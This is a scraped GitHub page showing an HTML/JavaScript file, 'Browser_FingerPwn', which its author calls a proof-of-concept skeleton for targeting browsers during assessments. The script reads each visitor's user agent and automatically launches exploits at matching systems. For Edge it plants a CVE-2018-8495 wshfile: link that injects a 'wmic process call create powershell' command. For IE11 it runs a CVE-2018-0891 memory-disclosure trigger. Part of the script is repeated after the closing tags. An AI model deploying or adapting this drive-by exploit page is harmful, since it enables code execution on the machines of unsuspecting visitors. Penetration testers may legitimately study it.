-
Notifications
You must be signed in to change notification settings - Fork 16
Expand file tree
/
Copy pathBrowser_FingerPwn.html
More file actions
143 lines (120 loc) · 3.6 KB
/
Browser_FingerPwn.html
File metadata and controls
143 lines (120 loc) · 3.6 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
<meta http-equiv="Cache-Control" content="no-store" />
<head>
<script>
/*
Dirty Proof-of-concept (or skeleton) that could be used for browser targeting during assessments.
This is a personal source code, that's why this one is more a PoC/skeleton than a tool and use very dirty JS and PoC as payloads.
Sorry for purists but it make the job with few modifications so.....
To be completed.... later maybe.
kmkz
*/
// UserAgent init
var useragent = navigator.userAgent;
// OS
var win7 = /(Windows 7|Windows NT 6.1)/;
var win8 = /(Windows 8|Windows NT 6.2)/;
var win8_1 = /(Windows 8.1|Windows NT 6.3)/;
var win10 = /(Windows 10.0|Windows NT 10.0)/;
var linux = /(Linux x86)/;
var andro = /(Android)/;
// Browser
var edge = /edge/i;
// Fingerprinting (to complete for browsers versions)
if (win7.test(useragent)){
document.write("Win7 detected <br/>");
//if win7 + I.E 11:
cve_2018_0891();
}
else if (win8.test(useragent)){
document.write("Win8 detected <br/>");
document.write(useragent);
}
else if (win8_1.test(useragent)){
document.write("Win8.1 detected <br/>");
document.write(useragent);
}
else if (win10.test(useragent)){
document.write("Win10 detected <br/>");
document.write(useragent);
if (edge.test(useragent)){
document.write("<br/>Edge detected <br/>Launching exploit ... <br/>");
cve_2018_8495();
}
}
else if (linux.test(useragent)){
document.write("Linux detected <br/>");
document.write(useragent);
}
else if (andro.test(useragent)){
document.write("Android detected <br/>");
document.write(useragent);
}
else{
document.write("Unable to fingerprint browser version <br/> No exploit for you :-* <br/>");
}
// Payloads (todo)
function cve_2018_8495(){
document.body.innerHTML ='<a id="q" href=\'wshfile:test/../../System32/SyncAppvPublishingServer.vbs" test test;wmic process call create powershell;"\'>Exploit !</a>';
return 0;
}
function cve_2018_0891(){
// PoC only
function main() {
RegExp.input = {toString: f};
alert(RegExp.lastMatch);
}
var input = [Array(10000000).join("a"), Array(11).join("b"), Array(100).join("a")].join("");
function f() {
String.prototype.match.call(input, "bbbbbbbbbb");
}
main();
}
</script>
</head>
</body>
// Browser
var edge = /edge/i;
// Fingerprinting (to complete for browsers versions)
if (win7.test(useragent)){
document.write("Win7 detected <br/>");
//if win7 + I.E 11:
cve_2018_0891();
}
else if (win8.test(useragent)){
document.write("Win8 detected <br/>");
document.write(useragent);
}
else if (win8_1.test(useragent)){
document.write("Win8.1 detected <br/>");
document.write(useragent);
}
else if (win10.test(useragent)){
document.write("Win10 detected <br/>");
document.write(useragent);
if (edge.test(useragent)){
document.write("<br/>Edge detected <br/>Launching exploit ... <br/>");
cve_2018_8495();
}
}else{
document.write("Unable to fingerprint browser version <br/> No exploit for you :-* <br/>");
}
// Payloads (todo)
function cve_2018_8495(){
document.body.innerHTML ='<a id="q" href=\'wshfile:test/../../System32/SyncAppvPublishingServer.vbs" test test;wmic process call create powershell;"\'>Exploit !</a>';
return 0;
}
function cve_2018_0891(){
// PoC only
function main() {
RegExp.input = {toString: f};
alert(RegExp.lastMatch);
}
var input = [Array(10000000).join("a"), Array(11).join("b"), Array(100).join("a")].join("");
function f() {
String.prototype.match.call(input, "bbbbbbbbbb");
}
main();
}
</script>
</head>
</body>